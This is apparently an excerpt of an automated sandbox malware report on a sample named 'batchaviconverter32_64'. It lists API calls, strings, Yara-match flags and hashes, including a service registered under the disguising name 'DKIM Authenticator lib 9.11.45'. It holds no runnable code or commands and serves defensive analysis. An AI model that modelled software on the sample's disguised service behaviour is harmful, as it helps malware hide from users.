                                                              • Opcode Fuzzy Hash: 7e16860faa1408c7c55987ee4ca1ba6a2a54c48f9f8a63b0668f5852601dbab4
                                                              • Instruction Fuzzy Hash: F0B09230C0C20587CB049AD489888B9363CE6062557105972942BB1080D77881279549
                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 0040238D
                                                              • SetServiceStatus.ADVAPI32(0040A0E0), ref: 0040239E
                                                              • SetEvent.KERNEL32 ref: 004023AA
                                                              • RegisterServiceCtrlHandlerA.ADVAPI32(DKIM Authenticator lib 9.11.45,0040235E), ref: 004023C1
                                                              • SetServiceStatus.ADVAPI32(0040A0E0), ref: 00402420
                                                              • GetLastError.KERNEL32 ref: 00402422
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                              • GetLastError.KERNEL32 ref: 00402450
                                                              • SetServiceStatus.ADVAPI32(0040A0E0), ref: 00402480
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                              • CloseHandle.KERNEL32 ref: 004024A1
                                                              • SetServiceStatus.ADVAPI32(0040A0E0), ref: 004024CA
                                                              Strings
                                                              • DKIM Authenticator lib 9.11.45, xrefs: 004023BC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Service$Status$ErrorLast$CreateEvent$CloseCtrlHandleHandlerObjectRegisterSingleThreadWait
                                                              • String ID: DKIM Authenticator lib 9.11.45
                                                              • API String ID: 1146649175-992513482
                                                              • Opcode ID: dde84ccb3db8421524e4956b5ba65e4b5966ca61601a6f30d71ab06ccbec0c6b
                                                              • Instruction ID: 50cf42f73b490f19b5de10854d6e10100ea54590a44505af00a79cc1c0070098
                                                              • Opcode Fuzzy Hash: dde84ccb3db8421524e4956b5ba65e4b5966ca61601a6f30d71ab06ccbec0c6b
                                                              • Instruction Fuzzy Hash: D7310970841309EBD710DF16EF49A567FA8EB85755B11C03BE206B22B0D7BA0464EB2E
                                                              APIs
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D81D11
                                                              • GetLastError.KERNEL32 ref: 02D81D23
                                                                • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D81D59
                                                              • GetLastError.KERNEL32 ref: 02D81D6B
                                                              • __beginthreadex.LIBCMT ref: 02D81DB1
                                                              • GetLastError.KERNEL32 ref: 02D81DC6
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D81DDD
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D81DEC
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D81E14
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D81E1B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                              • String ID: thread$thread.entry_event$thread.exit_event
                                                              • API String ID: 831262434-3017686385
                                                              • Opcode ID: 01bd6754a9523608e0da20f1b5667ec8aa9a8a39e60f242b5cd88ea84202400f
                                                              • Instruction ID: ac5314de943c4bf5240c7dc893688e7895c0fe565d95b64622b31c938f3f0c34
                                                              • Opcode Fuzzy Hash: 01bd6754a9523608e0da20f1b5667ec8aa9a8a39e60f242b5cd88ea84202400f
                                                              • Instruction Fuzzy Hash: 78316A71A043019FE700EF20C849B2FBBA5EB84715F10496DF9598B391EB70DC4ACBA2
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D824E6
                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02D824FC
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02D8250E
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02D8256D
                                                              • SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 02D8257F
                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 02D82599
                                                              • GetLastError.KERNEL32(?,7591DFB0), ref: 02D825A2
                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D825F0
                                                              • InterlockedDecrement.KERNEL32(00000002), ref: 02D8262F
                                                              • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02D8268E
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D82699
                                                              • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02D826AD
                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 02D826BD
                                                              • GetLastError.KERNEL32(?,7591DFB0), ref: 02D826C7
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                              • String ID:
                                                              • API String ID: 1213838671-0
                                                              • Opcode ID: 3d9753ab6494b334abd9de735f17bec3fee4eb452d5c7b321ee2c12787a7c98a
                                                              • Instruction ID: faaa1ad114ae4e792e3de75452d8c5fedc3ec62b79d5a7daeafc86ab2e3c8452
                                                              • Opcode Fuzzy Hash: 3d9753ab6494b334abd9de735f17bec3fee4eb452d5c7b321ee2c12787a7c98a
                                                              • Instruction Fuzzy Hash: DA611871900249AFDB10EFA4D989EAEBBB9FF08314F10496AE956E3340D734AD54CF64
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D84608
                                                                • Part of subcall function 02D93A7C: _malloc.LIBCMT ref: 02D93A94
                                                              • htons.WS2_32(?), ref: 02D84669
                                                              • htonl.WS2_32(?), ref: 02D8468C
                                                              • htonl.WS2_32(00000000), ref: 02D84693
                                                              • htons.WS2_32(00000000), ref: 02D84747
                                                              • _sprintf.LIBCMT ref: 02D8475D
                                                                • Part of subcall function 02D888BE: _memmove.LIBCMT ref: 02D888DE
                                                              • htons.WS2_32(?), ref: 02D846B0
                                                                • Part of subcall function 02D89669: __EH_prolog.LIBCMT ref: 02D8966E
                                                                • Part of subcall function 02D89669: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D896E9
                                                                • Part of subcall function 02D89669: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D89707
                                                                • Part of subcall function 02D81BA7: __EH_prolog.LIBCMT ref: 02D81BAC
                                                                • Part of subcall function 02D81BA7: RtlEnterCriticalSection.NTDLL ref: 02D81BBC
                                                                • Part of subcall function 02D81BA7: RtlLeaveCriticalSection.NTDLL ref: 02D81BEA
                                                                • Part of subcall function 02D81BA7: RtlEnterCriticalSection.NTDLL ref: 02D81C13
                                                                • Part of subcall function 02D81BA7: RtlLeaveCriticalSection.NTDLL ref: 02D81C56
                                                                • Part of subcall function 02D8DE25: __EH_prolog.LIBCMT ref: 02D8DE2A
                                                              • htonl.WS2_32(?), ref: 02D8497C
                                                              • htonl.WS2_32(00000000), ref: 02D84983
                                                              • htonl.WS2_32(00000000), ref: 02D849C8
                                                              • htonl.WS2_32(00000000), ref: 02D849CF
                                                              • htons.WS2_32(?), ref: 02D849EF
                                                              • htons.WS2_32(?), ref: 02D849F9
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                              • String ID:
                                                              • API String ID: 1645262487-0
                                                              • Opcode ID: bffe3a1231a8a7b05d08b49728d36b816b1ef6feecb022e70b2a8e162b341281
                                                              • Instruction ID: cb3acfb1b081a13f791c0239e3720c56b31552410671ef3696246963cf3dd961
                                                              • Opcode Fuzzy Hash: bffe3a1231a8a7b05d08b49728d36b816b1ef6feecb022e70b2a8e162b341281
                                                              • Instruction Fuzzy Hash: A8022571D0025EEEEF15EBA4D844BEEBBB9EF08304F10455AE505A7280DB746E49CFA1
                                                              APIs
                                                              • RtlDecodePointer.NTDLL(?), ref: 02D9826A
                                                              • _free.LIBCMT ref: 02D98283
                                                                • Part of subcall function 02D92EA4: HeapFree.KERNEL32(00000000,00000000,?,02D95C02,00000000,00000104,75920A60), ref: 02D92EB8
                                                                • Part of subcall function 02D92EA4: GetLastError.KERNEL32(00000000,?,02D95C02,00000000,00000104,75920A60), ref: 02D92ECA
                                                              • _free.LIBCMT ref: 02D98296
                                                              • _free.LIBCMT ref: 02D982B4
                                                              • _free.LIBCMT ref: 02D982C6
                                                              • _free.LIBCMT ref: 02D982D7
                                                              • _free.LIBCMT ref: 02D982E2
                                                              • _free.LIBCMT ref: 02D98306
                                                              • RtlEncodePointer.NTDLL(0074E218), ref: 02D9830D
                                                              • _free.LIBCMT ref: 02D98322
                                                              • _free.LIBCMT ref: 02D98338
                                                              • _free.LIBCMT ref: 02D98360
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 3064303923-0
                                                              • Opcode ID: 5d705446e13bf2c9167e55d1bf84174f7d99005faa7a2cdd0d1971c815d74685
                                                              • Instruction ID: b64d6e6210be20decabbb7c83fc638d26f90a1e43b71110736d54c715bcc421f
                                                              • Opcode Fuzzy Hash: 5d705446e13bf2c9167e55d1bf84174f7d99005faa7a2cdd0d1971c815d74685
                                                              • Instruction Fuzzy Hash: 4F217C72D41210EFCF266F26E89451A77ADEF46B20729482AF804D7340C735DC65EFA0
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D84D8B
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D84DB7
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D84DC3
                                                                • Part of subcall function 02D84BED: __EH_prolog.LIBCMT ref: 02D84BF2
                                                                • Part of subcall function 02D84BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D84CF2
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D84E93
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D84E99
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D84EA0
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D84EA6
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D850A7
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D850AD
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D850B8
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D850C1
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                              • String ID:
                                                              • API String ID: 2062355503-0
                                                              • Opcode ID: 94b3dc5536eede06d2f1689dafa36bd4f43c1d9bb721285dc05f906a75796815
                                                              • Instruction ID: d7e58307326a7b0f753494b3164c06ea088816debf8d08326090d0f576a1cbee
                                                              • Opcode Fuzzy Hash: 94b3dc5536eede06d2f1689dafa36bd4f43c1d9bb721285dc05f906a75796815
                                                              • Instruction Fuzzy Hash: E9B11871D0425EDFEF25EFA0D840BEEBBB5AF04314F24405AE805A6280DB755E49CFA5
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035B9
                                                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035CD
                                                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035F9
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402DE4), ref: 00403631
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402DE4), ref: 00403653
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402DE4), ref: 0040366C
                                                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 0040367F
                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004036BD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                              • String ID: -@
                                                              • API String ID: 1823725401-2999422947
                                                              • Opcode ID: d09c44be7b725e9416f1bbabc7ff939c5033ef1a694eb4ed66286c613d9d8241
                                                              • Instruction ID: a052efc5f8264b04540ba139265ff63877c4dc4e75c0ae38b6650f7b3518fcca
                                                              • Opcode Fuzzy Hash: d09c44be7b725e9416f1bbabc7ff939c5033ef1a694eb4ed66286c613d9d8241
                                                              • Instruction Fuzzy Hash: 7A31F0B24042217EDB303F785C8883B7E9CE64574A7120D3BF542E3390E67A8E814AAD
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D83428
                                                              • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02D8346B
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02D83472
                                                              • GetLastError.KERNEL32 ref: 02D83486
                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D834D7
                                                              • RtlEnterCriticalSection.NTDLL(00000018), ref: 02D834ED
                                                              • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02D83518
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                              • String ID: CancelIoEx$KERNEL32
                                                              • API String ID: 2902213904-434325024
                                                              • Opcode ID: 2804fe24ece6c998cdf8c9be39e2b34db06c3ba4f4a80933757205a0f6f3d1fd
                                                              • Instruction ID: 48f376123c8ae77a461841afd27ef1c88019f85da578670d3ac17ca85c297a68
                                                              • Opcode Fuzzy Hash: 2804fe24ece6c998cdf8c9be39e2b34db06c3ba4f4a80933757205a0f6f3d1fd
                                                              • Instruction Fuzzy Hash: 3B317C75904205DFEB01AF68D844AAEBBF9FF48711F1084AAE8099B341D774DD11CBA1
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403D7D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 0040541A
                                                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405432
                                                              • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405443
                                                              • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00405450
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
                                                              • API String ID: 2238633743-4073082454
                                                              • Opcode ID: c1c5459b902c6d691e26e6f6b3d5bc075fbf46770f4929c54e66e674ea662e67
                                                              • Instruction ID: 002c49bf34bfddc632f277928187d9a53126bd14f393e8a72b926efab3457658
                                                              • Opcode Fuzzy Hash: c1c5459b902c6d691e26e6f6b3d5bc075fbf46770f4929c54e66e674ea662e67
                                                              • Instruction Fuzzy Hash: E1018431740705AFC7109FB4AD80E6B7AE9FB48791309843BB955F22A1D778C860CF69
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403CC6
                                                              • GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00403D9C
                                                              • WriteFile.KERNEL32(00000000), ref: 00403DA3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: File$HandleModuleNameWrite
                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $r@
                                                              • API String ID: 3784150691-1191147370
                                                              • Opcode ID: d598713df4d839de7fd74915155ccdeaa4efa499b3dc35e679589c6eb5dc5418
                                                              • Instruction ID: 901e413bd7d296cb1b0b97d790854a8d5494ec17f79a926850544caa0371b074
                                                              • Opcode Fuzzy Hash: d598713df4d839de7fd74915155ccdeaa4efa499b3dc35e679589c6eb5dc5418
                                                              • Instruction Fuzzy Hash: F831C772A04208AEEF20EF60DE49F9A776CEF45304F1004BBF545F61C1D6B8AA858A59
                                                              APIs
                                                              • LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 00405917
                                                              • LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405933
                                                              • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,004051A5,?,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 0040597C
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 004059B4
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405A0C
                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405A22
                                                              • LCMapStringW.KERNEL32(00000000,?,004051A5,00000000,004051A5,?,?,004051A5,00200020,00000000,?,00000000), ref: 00405A55
                                                              • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405ABD
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: String$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 352835431-0
                                                              • Opcode ID: 6e7e0904aad4ffb7df7fa70090622cd283316a6a4d1fe7c3c07164d91eefa06b
                                                              • Instruction ID: ad677ee5f46337090c489763c5b1535e0d4a7e7cc2f37d679e5ddd81b555dfe6
                                                              • Opcode Fuzzy Hash: 6e7e0904aad4ffb7df7fa70090622cd283316a6a4d1fe7c3c07164d91eefa06b
                                                              • Instruction Fuzzy Hash: 8B516C71A00609EFCF218FA5DD85A9F7FB5FB48750F14422AF911B21A0D3398921DF69
                                                              APIs
                                                              • OpenEventA.KERNEL32(00100002,00000000,00000000,29E2DDE5), ref: 02D915E0
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D915F5
                                                              • ResetEvent.KERNEL32(00000000,29E2DDE5), ref: 02D915FF
                                                              • CloseHandle.KERNEL32(00000000,29E2DDE5), ref: 02D91634
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,29E2DDE5), ref: 02D916AA
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D916BF
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEventHandle$CreateOpenReset
                                                              • String ID:
                                                              • API String ID: 1285874450-0
                                                              • Opcode ID: fd59793e34878e10ddbfd3a22be253b3904bce2d918f9716a2f7ff78a676ccac
                                                              • Instruction ID: 44a95068c66046846b1b7e6ce0718d603793789085bc5dda1155e80692e9def8
                                                              • Opcode Fuzzy Hash: fd59793e34878e10ddbfd3a22be253b3904bce2d918f9716a2f7ff78a676ccac
                                                              • Instruction Fuzzy Hash: E6412A70D0535AABDF20DFA5C848BADBBB8EF05724F144619F819AB380D7309D05CBA0
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02D820AC
                                                              • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02D820CD
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D820D8
                                                              • InterlockedDecrement.KERNEL32(?), ref: 02D8213E
                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02D8217A
                                                              • InterlockedDecrement.KERNEL32(?), ref: 02D82187
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D821A6
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                              • String ID:
                                                              • API String ID: 1171374749-0
                                                              • Opcode ID: ffde32ff66600ba8b60154a93cb4999b4283148e5ee94ce78a8f828b68e7b4e6
                                                              • Instruction ID: 4e3919435e84939b0ad736da5086d8f9928bcdd3f44a80958aca50880370b37a
                                                              • Opcode Fuzzy Hash: ffde32ff66600ba8b60154a93cb4999b4283148e5ee94ce78a8f828b68e7b4e6
                                                              • Instruction Fuzzy Hash: B54139755047419FD321EF25D889A6BBBF9EBC8754F100A1EF89A82650D730E909CFA2
                                                              APIs
                                                                • Part of subcall function 02D91E00: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02D9165E,?,?), ref: 02D91E2F
                                                                • Part of subcall function 02D91E00: CloseHandle.KERNEL32(00000000,?,?,02D9165E,?,?), ref: 02D91E44
                                                                • Part of subcall function 02D91E00: SetEvent.KERNEL32(00000000,02D9165E,?,?), ref: 02D91E57
                                                              • OpenEventA.KERNEL32(00100002,00000000,00000000,29E2DDE5), ref: 02D915E0
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D915F5
                                                              • ResetEvent.KERNEL32(00000000,29E2DDE5), ref: 02D915FF
                                                              • CloseHandle.KERNEL32(00000000,29E2DDE5), ref: 02D91634
                                                              • __CxxThrowException@8.LIBCMT ref: 02D91665
                                                                • Part of subcall function 02D9448A: RaiseException.KERNEL32(?,?,02D8FA91,?,?,?,?,?,?,?,02D8FA91,?,02DB0F88,?), ref: 02D944DF
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,29E2DDE5), ref: 02D916AA
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D916BF
                                                                • Part of subcall function 02D91B40: GetCurrentProcessId.KERNEL32(?), ref: 02D91B99
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,29E2DDE5), ref: 02D916CF
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                              • String ID:
                                                              • API String ID: 2227236058-0
                                                              • Opcode ID: 3d7bf6d549a396ab1bee61ad9c9147592583d2133812b4fc9e8cc4a0f0984a47
                                                              • Instruction ID: 46741810742b1df897732e91cef1c91fa8815cd4c7dee8c2028a88f8fcc05b9f
                                                              • Opcode Fuzzy Hash: 3d7bf6d549a396ab1bee61ad9c9147592583d2133812b4fc9e8cc4a0f0984a47
                                                              • Instruction Fuzzy Hash: 84315A71E0135AABDF20DBA49C44BADB7B9AF05325F184219F81DEB380E760DD05CB61
                                                              APIs
                                                              • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403A36), ref: 00404639
                                                              • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403A36), ref: 0040465D
                                                              • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403A36), ref: 00404677
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403A36), ref: 00404738
                                                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403A36), ref: 0040474F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual$FreeHeap
                                                              • String ID: r@$r@
                                                              • API String ID: 714016831-1712950306
                                                              • Opcode ID: 6146d640eca2786615fae02a601f05dd2cfcbd8d5d5bc8993479f9a7be96b628
                                                              • Instruction ID: 6d2ae56a8b2e66d9b660bb9c1c671dd7469dd609f739855ae4ec176a3c74651c
                                                              • Opcode Fuzzy Hash: 6146d640eca2786615fae02a601f05dd2cfcbd8d5d5bc8993479f9a7be96b628
                                                              • Instruction Fuzzy Hash: 3531BEB0940702ABD3309F24DD44B66B7A4EB86755F11463BF265BB2D0E7B8A8418B4D
                                                              APIs
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02D82706
                                                              • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D8272B
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DA5A93), ref: 02D82738
                                                                • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                              • SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02D82778
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02D827D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                              • String ID: timer
                                                              • API String ID: 4293676635-1792073242
                                                              • Opcode ID: 7310d9a0b3a439e7fab727e77d00eef560d59da6dbc7512709cb7a42504b8344
                                                              • Instruction ID: d135208a7dee63910ebc6c1306116236d5adf1d9e5bdc8d3909a571260698b40
